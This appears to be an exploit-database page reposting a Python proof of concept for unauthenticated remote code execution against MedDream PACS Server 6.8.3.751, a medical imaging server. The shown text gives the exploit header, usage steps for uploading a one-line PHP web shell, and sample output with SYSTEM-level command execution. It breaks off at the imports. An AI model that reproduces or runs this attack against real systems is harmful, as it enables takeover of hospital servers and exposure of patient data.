Exploits / Vulnerability Discovered : 2020-10-12 |
Type : webapps |
Platform : php
This exploit / vulnerability Meddream pacs server 6.8.3.751 remote code execution (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 10-10-2020
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
# Vendor Homepage: https://www.softneta.com
# Version: 6.8.3.751
# Tested On: Windows 2016
#
#
# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
#
##PoC##
#
# 1. create one line php shell to call commands
# 2. run script on attacking machine
# 3. enter parameters; IP, filename, command
#
#
# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter command: whoami
# 170759
# <pre>nt authority\system
# </pre>
# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#
from urllib2 import urlopen
import requests
import sys
import time
from datetime import datetime, timedelta